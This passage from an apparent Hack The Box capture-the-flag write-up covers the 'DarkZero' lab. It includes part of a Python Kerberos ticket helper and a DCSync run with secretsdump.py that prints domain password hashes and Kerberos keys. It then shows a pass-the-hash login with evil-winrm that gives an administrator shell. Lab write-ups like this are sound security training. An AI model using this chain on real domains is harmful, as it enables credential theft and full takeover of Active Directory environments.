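    Session key and ticket cipher are dummy bytes; names, times and flags mirror the captured ticket."""
    ticket = _tlv(0x61, _tlv(0x30, _ctx(0, _int(5)) + _ctx(1, _gs("DARKZERO.HTB"))
                  + _ctx(2, _name("krbtgt", "DARKZERO.HTB"))
                  + _ctx(3, _tlv(0x30, _ctx(0, _int(18)) + _ctx(2, _tlv(0x04, b"\x00" * 16))))))
    flags = 0x60A10000  # forwardable | forwarded | renewable | pre-authent | name_canonicalize
    info = _tlv(0x30, _ctx(0, _tlv(0x30, _ctx(0, _int(18)) + _ctx(1, _tlv(0x04, b"\x11" * 32))))
                + _ctx(1, _gs("DARKZERO.HTB")) + _ctx(2, _name("DC01$"))
                + _ctx(3, _tlv(0x03, b"\x00" + flags.to_bytes(4, "big")))
                + _ctx(5, _gt("20251005174615Z")) + _ctx(6, _gt("20251006034614Z"))
                + _ctx(7, _gt("20251012174614Z")) + _ctx(8, _gs("DARKZERO.HTB"))
                + _ctx(9, _name("krbtgt", "DARKZERO.HTB")))
    enc_part = _tlv(0x7D, _tlv(0x30, _ctx(0, _tlv(0x30, info))))
    cred = _tlv(0x76, _tlv(0x30, _ctx(0, _int(5)) + _ctx(1, _int(22)) + _ctx(2, _tlv(0x30, ticket))
                + _ctx(3, _tlv(0x30, _ctx(0, _int(0)) + _ctx(2, _tlv(0x04, enc_part))))))
    return base64.b64encode(cred).decode()


if __name__ == "__main__":
    import sys
    blob = sys.stdin.read() if not sys.stdin.isatty() else build_sample_kirbi()
    for k, v in triage(blob).items():
        print(f"{k:>10}: {v}")
```

Run it as python3 kirbi_triage.py < dc01.kirbi.b64; if the client is not the machine account you coerced, or forwarded is missing, the coercion hit the wrong service and the ticket will not give you DC01$'s rights.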
DC01$ is a domain controller account and therefore holds the replication rights needed for DCSync. Load the ticket and run secretsdump.py against DC01 to dump all the hashes:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ secretsdump.py -k -no-pass -just-dc darkzero.htb/'DC01$'@dc01.darkzero.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b15a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...
Then pass the Administrator NT hash to evil-winrm to get an administrator shell on DC01:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ evil-winrm -i darkzero.htb -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/5/2025 1:05 PM 34 root.txt
-ar--- 10/5/2025 1:05 PM 34 user.txt
Description
The overall challenge on this machine wasn't too great; the main frustration was escalating privileges on DC02. I'm not sure whether this is due to MSF or the machine itself. When using sessions to escalate privileges, I constantly ran into execution freezes and session timeouts. I understand this might be due to a race-condition vulnerability, but getting stuck repeatedly is incredibly frustrating.
A possible solution might be to open multiple sessions simultaneously and then use exploit -j during exploit execution to prevent session closures.